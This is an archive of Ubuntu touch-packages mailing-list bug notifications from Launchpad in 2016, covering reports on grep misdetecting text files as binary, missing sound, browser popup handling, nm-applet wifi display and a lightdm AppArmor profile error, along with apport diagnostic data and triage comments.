  ApportVersion: 2.19.1-0ubuntu5
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Mon Jan 18 22:43:51 2016
  InstallationDate: Installed on 2013-10-11 (829 days ago)
  InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130424)
  SourcePackage: grep
  UpgradeStatus: Upgraded to wily on 2016-01-18 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1535458/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589091] [NEW] i can't hear any sounds in my computer while using ubuntu

2016-06-04 Thread gokul
Public bug reported:

i have newly installed ubuntu .but can't hear sounds

** Affects: alsa-driver (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1589091

Title:
  i can't hear any sounds in my computer while using ubuntu

Status in alsa-driver package in Ubuntu:
  New

Bug description:
  i have newly installed ubuntu .but can't hear sounds

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1589091/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589090] [NEW] opening a popup/tab should directly focus it

2016-06-04 Thread Michael Zanetti
Public bug reported:

configuring a wifi router with the Ubuntu browser, I thought the website
or browser would not work because clicking links would not do anything.
Took me quite a while to find out that clicking that link actually
opened popups in new tabs, but because new tabs are not focused by
default, and also hidden in the bottom edge when the window is smallish,
I opened like 20 popups before even realizing what's going on.

=> when a website opens a new tab or popup (which effectively ends up as
a tab in this browser) as response to a user interaction (I actively
clicked a link to open it, it wasn't just spam) it should be
automatically focused, or, at the very least some clear indication that
there has been a new tab opened.

** Affects: webbrowser-app (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589090

Title:
  opening a popup/tab should directly focus it

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  configuring a wifi router with the Ubuntu browser, I thought the
  website or browser would not work because clicking links would not do
  anything. Took me quite a while to find out that clicking that link
  actually opened popups in new tabs, but because new tabs are not
  focused by default, and also hidden in the bottom edge when the window
  is smallish, I opened like 20 popups before even realizing what's
  going on.

  => when a website opens a new tab or popup (which effectively ends up
  as a tab in this browser) as response to a user interaction (I
  actively clicked a link to open it, it wasn't just spam) it should be
  automatically focused, or, at the very least some clear indication
  that there has been a new tab opened.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589090/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589089] [NEW] Impossible to use webbrowser for anything that uses a popup

2016-06-04 Thread Michael Zanetti
Public bug reported:

today I wanted to configure a WiFi router with the Ubuntu browser. Turns
out that's not possible because the router's webinterface uses popups to
ask the user for selecting something. The popups are opened as new tabs.
When I switch to them, and then click on the selection the popup closes
again and I end up on the original page, however, the page reloads and
all the previous state is lost.

=> The webbrowser should not reload the page when switching to a tab.

(I presume the reason is that it actually unloads the page as soon as
one switches away in order to save some memory, but still this is too
intrusive. It will break too much and needs to be turned off again - It
kinda makes the webbrowser useless as it is right now.)

** Affects: webbrowser-app (Ubuntu)
 Importance: Critical
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to webbrowser-app in Ubuntu.
https://bugs.launchpad.net/bugs/1589089

Title:
  Impossible to use webbrowser for anything that uses a popup

Status in webbrowser-app package in Ubuntu:
  New

Bug description:
  today I wanted to configure a WiFi router with the Ubuntu browser.
  Turns out that's not possible because the router's webinterface uses
  popups to ask the user for selecting something. The popups are opened
  as new tabs. When I switch to them, and then click on the selection
  the popup closes again and I end up on the original page, however, the
  page reloads and all the previous state is lost.

  => The webbrowser should not reload the page when switching to a tab.

  (I presume the reason is that it actually unloads the page as soon as
  one switches away in order to save some memory, but still this is too
  intrusive. It will break too much and needs to be turned off again -
  It kinda makes the webbrowser useless as it is right now.)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/webbrowser-app/+bug/1589089/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1535458] Re: [15.10 REGRESSION] Randomly wrongly detects files as binary

2016-06-04 Thread Alberto Salvia Novella
@ teo

If you see that a bug is affecting a release, it is important to enter
its first name into the tag list. So I will notice it and promote it.

** Changed in: grep (Ubuntu)
   Importance: Undecided => High

** Tags added: xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to grep in Ubuntu.
https://bugs.launchpad.net/bugs/1535458

Title:
  [15.10 REGRESSION] Randomly wrongly detects files as binary

Status in grep package in Ubuntu:
  Confirmed

Bug description:
  I have a folder with a bunch of subfolder and several hundred or
  thousands files, most of them PHP files (obviously text).

  I often use grep recursively, like this:
$ grep -R somepattern *

  Since the upgrade from 15.04 to 15.10, it often happens that a lot of text 
files are wrongly treated as binary. That means that, when a match is found, 
instead of getting the normal output which would show the file name and the 
matching line (with the matching substring highlighted), I get the bogus 
message:
binary file whatever.php matches

  Just to be clear: in one invocation of grep -R, I get mixed output
  with a lot of matches shown in the expected way and quit e a few
  matches shown in the wrong way, even though ALL matching files are
  text files.

  
  This worked as expected before the upgrade from 15.04 and 15.10.

  
  This is a HUGE issue that makes it impossible to do everyday developing work.

  
  Until you fix it, please f***ing roll back grep to the previous version, 
because this sh** is unusable.

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: grep 2.21-2
  ProcVersionSignature: Ubuntu 4.2.0-23.28-generic 4.2.6
  Uname: Linux 4.2.0-23-generic x86_64
  NonfreeKernelModules: nvidia
  ApportVersion: 2.19.1-0ubuntu5
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Mon Jan 18 22:43:51 2016
  InstallationDate: Installed on 2013-10-11 (829 days ago)
  InstallationMedia: Ubuntu 13.04 "Raring Ringtail" - Release amd64 (20130424)
  SourcePackage: grep
  UpgradeStatus: Upgraded to wily on 2016-01-18 (0 days ago)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1535458/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589086] [NEW] i can't hear any sounds in my computer while using ubuntu

2016-06-04 Thread gokul
Public bug reported:

there is no sound in ubuntu. but other operating systems can play sound

ProblemType: Bug
DistroRelease: Ubuntu 10.04
Package: alsa-base 1.0.22.1+dfsg-0ubuntu3
ProcVersionSignature: Ubuntu 2.6.32-39.86-generic 2.6.32.56+drm33.22
Uname: Linux 2.6.32-39-generic i686
AlsaVersion:
 Advanced Linux Sound Architecture Driver Version 1.0.23.
 Compiled on Feb 14 2012 for kernel 2.6.32-39-generic (SMP).
Architecture: i386
AudioDevicesInUse:
 USERPID ACCESS COMMAND
 /dev/snd/controlC1:  gokul  1574 F pulseaudio
 /dev/snd/pcmC1D0c:   gokul  1574 F...m pulseaudio
 /dev/snd/controlC0:  gokul  1574 F pulseaudio
 /dev/snd/pcmC0D3p:   gokul  1574 F...m pulseaudio
Card0.Amixer.info:
 Card hw:0 'Generic'/'HD-Audio Generic at 0xfeb64000 irq 59'
   Mixer name   : 'ATI R6xx HDMI'
   Components   : 'HDA:1002aa01,00aa0100,00100500'
   Controls  : 4
   Simple ctrls  : 1
Card0.Amixer.values:
 Simple mixer control 'IEC958',0
   Capabilities: pswitch pswitch-joined penum
   Playback channels: Mono
   Mono: Playback [on]
Card1.Amixer.info:
 Error: command ['amixer', '-c', '1', 'info'] failed with exit code 1: amixer: 
Mixer load hw:1 error: Invalid argument
 Card hw:1 'Generic_1'/'HD-Audio Generic at 0xfeb6 irq 16'
   Mixer name   : 'Realtek ALC887'
   Components   : 'HDA:10ec0887,1458a002,00100302'
   Controls  : 38
Card1.Amixer.values: Error: command ['amixer', '-c', '1'] failed with exit code 
1: amixer: Mixer hw:1 load error: Invalid argument
Date: Sat Jun  4 17:42:44 2016
InstallationMedia: IT@School Edubuntu 10.04 "Lucid Lynx" - Release i386 
(20110211.1)
PackageArchitecture: all
ProcEnviron:
 LANG=en_IN
 SHELL=/bin/bash
SourcePackage: alsa-driver
Symptom: audio
Title: Soundcard not detected
dmi.bios.date: 06/20/2014
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: F2
dmi.board.asset.tag: To be filled by O.E.M.
dmi.board.name: AM1M-S2H
dmi.board.vendor: Gigabyte Technology Co., Ltd.
dmi.board.version: x.x
dmi.chassis.asset.tag: To Be Filled By O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: Gigabyte Technology Co., Ltd.
dmi.chassis.version: To Be Filled By O.E.M.
dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrF2:bd06/20/2014:svnGigabyteTechnologyCo.,Ltd.:pnAM1M-S2H:pvrTobefilledbyO.E.M.:rvnGigabyteTechnologyCo.,Ltd.:rnAM1M-S2H:rvrx.x:cvnGigabyteTechnologyCo.,Ltd.:ct3:cvrToBeFilledByO.E.M.:
dmi.product.name: AM1M-S2H
dmi.product.version: To be filled by O.E.M.
dmi.sys.vendor: Gigabyte Technology Co., Ltd.

** Affects: alsa-driver (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: apport-bug i386 lucid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1589086

Title:
  i can't hear any sounds in my computer while using ubuntu

Status in alsa-driver package in Ubuntu:
  New

Bug description:
  there is no sound in ubuntu. but other operating systems can play
  sound

  ProblemType: Bug
  DistroRelease: Ubuntu 10.04
  Package: alsa-base 1.0.22.1+dfsg-0ubuntu3
  ProcVersionSignature: Ubuntu 2.6.32-39.86-generic 2.6.32.56+drm33.22
  Uname: Linux 2.6.32-39-generic i686
  AlsaVersion:
   Advanced Linux Sound Architecture Driver Version 1.0.23.
   Compiled on Feb 14 2012 for kernel 2.6.32-39-generic (SMP).
  Architecture: i386
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC1:  gokul  1574 F pulseaudio
   /dev/snd/pcmC1D0c:   gokul  1574 F...m pulseaudio
   /dev/snd/controlC0:  gokul  1574 F pulseaudio
   /dev/snd/pcmC0D3p:   gokul  1574 F...m pulseaudio
  Card0.Amixer.info:
   Card hw:0 'Generic'/'HD-Audio Generic at 0xfeb64000 irq 59'
 Mixer name : 'ATI R6xx HDMI'
 Components : 'HDA:1002aa01,00aa0100,00100500'
 Controls  : 4
 Simple ctrls  : 1
  Card0.Amixer.values:
   Simple mixer control 'IEC958',0
 Capabilities: pswitch pswitch-joined penum
 Playback channels: Mono
 Mono: Playback [on]
  Card1.Amixer.info:
   Error: command ['amixer', '-c', '1', 'info'] failed with exit code 1: 
amixer: Mixer load hw:1 error: Invalid argument
   Card hw:1 'Generic_1'/'HD-Audio Generic at 0xfeb6 irq 16'
 Mixer name : 'Realtek ALC887'
 Components : 'HDA:10ec0887,1458a002,00100302'
 Controls  : 38
  Card1.Amixer.values: Error: command ['amixer', '-c', '1'] failed with exit 
code 1: amixer: Mixer hw:1 load error: Invalid argument
  Date: Sat Jun  4 17:42:44 2016
  InstallationMedia: IT@School Edubuntu 10.04 "Lucid Lynx" - Release i386 
(20110211.1)
  PackageArchitecture: all
  ProcEnviron:
   LANG=en_IN
   SHELL=/bin/bash
  SourcePackage: alsa-driver
  Symptom: audio
  Title: Soundcard not detected
  dmi.bios.date: 06/20/2014
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: F2
  dmi.board.asset.tag: To be filled by O.E.M.
  dmi.board.name: AM1M-S2H
  dmi.board.vendor: Gigabyte Technology Co., Ltd.
  dmi.board.version: x.x

[Touch-packages] [Bug 1556134] Re: obex-check-device crashed with SIGSEGV in __GI_____strtoul_l_internal()

2016-06-04 Thread MrBl33t
*** This bug is a duplicate of bug 1539694 ***
https://bugs.launchpad.net/bugs/1539694

Hi, got this bug last two bootups. cant seem to open the other bug list.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to libopenobex in Ubuntu.
https://bugs.launchpad.net/bugs/1556134

Title:
  obex-check-device crashed with SIGSEGV in
  __GI_strtoul_l_internal()

Status in libopenobex package in Ubuntu:
  Confirmed

Bug description:
  on launch this crash occurs

  ProblemType: Crash
  DistroRelease: Ubuntu 16.04
  Package: libopenobex2 1.7.1-4
  ProcVersionSignature: Ubuntu 4.4.0-11.26-generic 4.4.4
  Uname: Linux 4.4.0-11-generic x86_64
  ApportVersion: 2.20-0ubuntu3
  Architecture: amd64
  Date: Wed Mar  9 16:14:37 2016
  Dependencies:
   gcc-6-base 6-20160227-0ubuntu1
   libc6 2.21-0ubuntu6
   libgcc1 1:6-20160227-0ubuntu1
   libudev1 229-2ubuntu1
   libusb-1.0-0 2:1.0.20-1
  ExecutablePath: /usr/sbin/obex-check-device
  InstallationDate: Installed on 2016-02-11 (28 days ago)
  InstallationMedia: Ubuntu 14.04.3 LTS "Trusty Tahr" - Beta amd64 (20150805)
  ProcCmdline: /usr/sbin/obex-check-device 01da
  ProcEnviron:
   
  SegvAnalysis:
   Segfault happened at: 0x7f8783a75674 <__GI_strtoul_l_internal+68>:   
movsbq (%r14),%rax
   PC (0x7f8783a75674) ok
   source "(%r14)" (0x) not located in a known VMA region (needed 
readable region)!
   destination "%rax" ok
  SegvReason: reading NULL VMA
  Signal: 11
  SourcePackage: libopenobex
  StacktraceTop:
   __GI_strtoul_l_internal (nptr=0x0, endptr=0x0, base=16, group=, loc=0x7f8783dff500 <_nl_global_locale>) at ../stdlib/strtol_l.c:297
   main ()
  Title: obex-check-device crashed with SIGSEGV in __GI_strtoul_l_internal()
  UpgradeStatus: Upgraded to xenial on 2016-03-02 (9 days ago)
  UserGroups:

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libopenobex/+bug/1556134/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589073] [NEW] nm-applet not showing existing wifi connection

2016-06-04 Thread Fernando Fernandez
Public bug reported:

Frequently, not always, the wifi connection and the existing wifi
networks don't show up on nm-applet. Still, the default network
connection is established in the background. But nm-applet does not
allow connection management.

In the picture: nm-applet shows no connections/netowrks but in the
connection information dialog you can confirm that the wifi connection
was established

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: network-manager 1.1.93-0ubuntu4
ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
Uname: Linux 4.4.0-22-generic x86_64
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
CurrentDesktop: Unity
Date: Sat Jun  4 11:33:41 2016
IfupdownConfig:
 # interfaces(5) file used by ifup(8) and ifdown(8)
 auto lo
 iface lo inet loopback
InstallationDate: Installed on 2016-05-16 (18 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
IpRoute:
 default via 192.168.1.254 dev wlp13s0  proto static  metric 600
 169.254.0.0/16 dev docker0  scope link  metric 1000 linkdown
 172.17.0.0/16 dev docker0  proto kernel  scope link  src 172.17.0.1 linkdown
 192.168.1.0/24 dev wlp13s0  proto kernel  scope link  src 192.168.1.113  
metric 600
 192.168.122.0/24 dev virbr0  proto kernel  scope link  src 192.168.122.1 
linkdown
NetworkManager.state:
 [main]
 NetworkingEnabled=true
 WirelessEnabled=true
 WWANEnabled=true
SourcePackage: network-manager
UpgradeStatus: No upgrade log present (probably fresh install)
nmcli-nm: Error: command ['nmcli', '-f', 'all', 'nm'] failed with exit code 2: 
Error: Object 'nm' is unknown, try 'nmcli help'.

** Affects: network-manager (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug xenial

** Attachment added: "Screenshot"
   
https://bugs.launchpad.net/bugs/1589073/+attachment/4676658/+files/network-manager-bug.png

** Description changed:

  Frequently, not always, the wifi connection and the existing wifi
  networks don't show up on nm-applet. Still, the default network
- connection is established in the background. Bu nm-applet does not allow
- connection management.
+ connection is established in the background. But nm-applet does not
+ allow connection management.
  
  In the picture: nm-applet shows no connections/netowrks but in the
  connection information dialog you can confirm that the wifi connection
  was established
  
  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: network-manager 1.1.93-0ubuntu4
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Sat Jun  4 11:33:41 2016
  IfupdownConfig:
-  # interfaces(5) file used by ifup(8) and ifdown(8)
-  auto lo
-  iface lo inet loopback
+  # interfaces(5) file used by ifup(8) and ifdown(8)
+  auto lo
+  iface lo inet loopback
  InstallationDate: Installed on 2016-05-16 (18 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  IpRoute:
-  default via 192.168.1.254 dev wlp13s0  proto static  metric 600 
-  169.254.0.0/16 dev docker0  scope link  metric 1000 linkdown 
-  172.17.0.0/16 dev docker0  proto kernel  scope link  src 172.17.0.1 linkdown 
-  192.168.1.0/24 dev wlp13s0  proto kernel  scope link  src 192.168.1.113  
metric 600 
-  192.168.122.0/24 dev virbr0  proto kernel  scope link  src 192.168.122.1 
linkdown
+  default via 192.168.1.254 dev wlp13s0  proto static  metric 600
+  169.254.0.0/16 dev docker0  scope link  metric 1000 linkdown
+  172.17.0.0/16 dev docker0  proto kernel  scope link  src 172.17.0.1 linkdown
+  192.168.1.0/24 dev wlp13s0  proto kernel  scope link  src 192.168.1.113  
metric 600
+  192.168.122.0/24 dev virbr0  proto kernel  scope link  src 192.168.122.1 
linkdown
  NetworkManager.state:
-  [main]
-  NetworkingEnabled=true
-  WirelessEnabled=true
-  WWANEnabled=true
+  [main]
+  NetworkingEnabled=true
+  WirelessEnabled=true
+  WWANEnabled=true
  SourcePackage: network-manager
  UpgradeStatus: No upgrade log present (probably fresh install)
  nmcli-nm: Error: command ['nmcli', '-f', 'all', 'nm'] failed with exit code 
2: Error: Object 'nm' is unknown, try 'nmcli help'.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1589073

Title:
  nm-applet not showing existing wifi connection

Status in network-manager package in Ubuntu:
  New

Bug description:
  Frequently, not always, the wifi connection and the existing wifi
  networks don't show up on nm-applet. Still, the default network
  connection is established in the background. But nm-applet does not
  allow connection management.

  In the picture: nm-applet shows no connections/netowrks but in the
  connection information dialog you can confirm that the wifi connection
  was established

  ProblemType: Bug
  DistroRelease: Ubunt

[Touch-packages] [Bug 1504551] Re: Text input popover and selection cursors not oriented properly in shell

2016-06-04 Thread Michal Predotka
I can reproduce this on M10 running rc-proposed. It displays the same
regardless if I had the tablet in portrait or landscape before screen
locked.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-ui-toolkit in
Ubuntu.
https://bugs.launchpad.net/bugs/1504551

Title:
  Text input popover and selection cursors not oriented properly in
  shell

Status in ubuntu-ui-toolkit package in Ubuntu:
  Triaged
Status in unity8 package in Ubuntu:
  Triaged

Bug description:
  See attached screenshot, tapping twice on the password entry shows the
  text overlay, but it's in hardware orientation, not the real one.

  It's been fixed for dialogs, but we must've missed popovers somehow.

  ProblemType: Bug
  DistroRelease: Ubuntu 15.10
  Package: qtdeclarative5-ubuntu-ui-toolkit-plugin 
1.3.1627+15.10.20150908-0ubuntu1
  ProcVersionSignature: Ubuntu 4.2.0-14.16-generic 4.2.2
  Uname: Linux 4.2.0-14-generic x86_64
  ApportVersion: 2.19.1-0ubuntu2
  Architecture: amd64
  CurrentDesktop: Unity
  Date: Fri Oct  9 15:17:56 2015
  SourcePackage: ubuntu-ui-toolkit
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/+bug/1504551/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589060] Re: Refresh Scopes in landscape mode not possible

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: unity-scopes-shell (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity-scopes-shell in
Ubuntu.
https://bugs.launchpad.net/bugs/1589060

Title:
  Refresh Scopes in landscape mode not possible

Status in unity-scopes-shell package in Ubuntu:
  Confirmed

Bug description:
  On bq Aquaris E4.5 one cannot refresh scopes in landscape mode since
  the scree is too small. There is not enough screen to pull down in
  order to refresh.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/unity-scopes-shell/+bug/1589060/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1496292] Re: Needs to be ported to packagekit 1

2016-06-04 Thread dino99
** Tags removed: vivid
** Tags added: xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1496292

Title:
  Needs to be ported to packagekit 1

Status in aptdaemon package in Ubuntu:
  Confirmed
Status in apturl package in Ubuntu:
  Confirmed
Status in nautilus-share package in Ubuntu:
  Confirmed
Status in packagekit package in Ubuntu:
  Confirmed
Status in sessioninstaller package in Ubuntu:
  Confirmed
Status in software-properties package in Ubuntu:
  Confirmed
Status in system-config-printer package in Ubuntu:
  Confirmed

Bug description:
  The Ubuntu Error Tracker has been receiving reports about a problem
  regarding aptdaemon.  This problem was most recently seen with version
  1.1.1+bzr982-0ubuntu8, the problem page at
  https://errors.ubuntu.com/problem/0cbdb94861b90a2bf18c183fb3031ed81f6bb5a7
  contains more details.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1496292/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581210] Re: test_aa-exec-click autopkgtest should not hardcode aa-exec path

2016-06-04 Thread Launchpad Bug Tracker
** Branch linked: lp:click-apparmor

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to click-apparmor in Ubuntu.
https://bugs.launchpad.net/bugs/1581210

Title:
  test_aa-exec-click autopkgtest should not hardcode aa-exec path

Status in click-apparmor package in Ubuntu:
  Triaged

Bug description:
  The apparmor 2.11 beta 1 release (2.10.95) moved aa-exec from
  /usr/sbin/ to /usr/bin/ but the test_aa-exec-click hard codes the path
  as /usr/sbin/aa-exec.

  The click-apparmor test needs to be updated so that the apparmor
  package's install logic can follow upstream's lead regarding the aa-
  exec path.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/click-apparmor/+bug/1581210/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589046] Re: Monospace font scaling changed between 15.10 and 16.04

2016-06-04 Thread ubuntu user
** Package changed: ubuntu => fonts-dejavu (Ubuntu)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to fonts-dejavu in Ubuntu.
https://bugs.launchpad.net/bugs/1589046

Title:
  Monospace font scaling changed between 15.10 and 16.04

Status in fonts-dejavu package in Ubuntu:
  New

Bug description:
  Verified booting system from live CD. Scaling of monospace font(or
  window with monospace font inside) has changed. In 16.04 the same
  monospace fond is smaller - visible in geany and Eclipse (see
  screenshot). Font is DejavuSansMono 10 (default ubuntu monospace font)
  in both cases . I think the scaling of same font should not change.

  Here you can find the screenshots:
  
http://askubuntu.com/questions/781430/font-or-windows-scaling-changed-between-15-10-and-16-04

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/fonts-dejavu/+bug/1589046/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589060] [NEW] Refresh Scopes in landscape mode not possible

2016-06-04 Thread Wolfgang Eder
Public bug reported:

On bq Aquaris E4.5 one cannot refresh scopes in landscape mode since the
scree is too small. There is not enough screen to pull down in order to
refresh.

** Affects: unity-scopes-shell (Ubuntu)
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity-scopes-shell in
Ubuntu.
https://bugs.launchpad.net/bugs/1589060

Title:
  Refresh Scopes in landscape mode not possible

Status in unity-scopes-shell package in Ubuntu:
  New

Bug description:
  On bq Aquaris E4.5 one cannot refresh scopes in landscape mode since
  the scree is too small. There is not enough screen to pull down in
  order to refresh.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/unity-scopes-shell/+bug/1589060/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589046] [NEW] Monospace font scaling changed between 15.10 and 16.04

2016-06-04 Thread Launchpad Bug Tracker
You have been subscribed to a public bug:

Verified booting system from live CD. Scaling of monospace font(or
window with monospace font inside) has changed. In 16.04 the same
monospace fond is smaller - visible in geany and Eclipse (see
screenshot). Font is DejavuSansMono 10 (default ubuntu monospace font)
in both cases . I think the scaling of same font should not change.

Here you can find the screenshots:
http://askubuntu.com/questions/781430/font-or-windows-scaling-changed-between-15-10-and-16-04

** Affects: fonts-dejavu (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: bot-comment font monospace scaling
-- 
Monospace font scaling changed between 15.10 and 16.04
https://bugs.launchpad.net/bugs/1589046
You received this bug notification because you are a member of Ubuntu Touch 
seeded packages, which is subscribed to fonts-dejavu in Ubuntu.

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581187] Re: AppArmor parser error for /etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session at line 14: Could not open 'abstractions/fcitx'

2016-06-04 Thread Tyler Hicks
** Also affects: lightdm
   Importance: Undecided
   Status: New

** Changed in: lightdm
   Status: New => In Progress

** Changed in: lightdm
 Assignee: (unassigned) => Tyler Hicks (tyhicks)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1581187

Title:
  AppArmor parser error for /etc/apparmor.d/lightdm-guest-session in
  /etc/apparmor.d/lightdm-guest-session at line 14: Could not open
  'abstractions/fcitx'

Status in Light Display Manager:
  In Progress
Status in lightdm package in Ubuntu:
  Triaged

Bug description:
  The current yakkety lightdm version has a regression in its AppArmor
  profile:

  $ sudo systemctl status apparmor.service
  ● apparmor.service - LSB: AppArmor initialization
 Loaded: loaded (/etc/init.d/apparmor; bad; vendor preset: enabled)
 Active: failed (Result: exit-code) since Thu 2016-05-12 18:03:37 CEST; 3h 
17min ago
   Docs: man:systemd-sysv-generator(8)

  May 12 18:03:37 autopkgtest apparmor[493]:  * Starting AppArmor profiles
  May 12 18:03:37 autopkgtest apparmor[493]: AppArmor parser error for 
/etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session 
at line 14: Could not open 'abstractions/fcitx'
  May 12 18:03:37 autopkgtest apparmor[493]: Skipping profile in 
/etc/apparmor.d/disable: usr.sbin.rsyslogd
  May 12 18:03:37 autopkgtest apparmor[493]: AppArmor parser error for 
/etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session 
at line 14: Could not open 'abstractions/fcitx'
  May 12 18:03:37 autopkgtest apparmor[493]: Skipping profile in 
/etc/apparmor.d/disable: usr.sbin.rsyslogd
  May 12 18:03:37 autopkgtest apparmor[493]:...fail!
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Control process 
exited, code=exited status=123
  May 12 18:03:37 autopkgtest systemd[1]: Failed to start LSB: AppArmor 
initialization.
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Unit entered failed 
state.
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Failed with result 
'exit-code'.

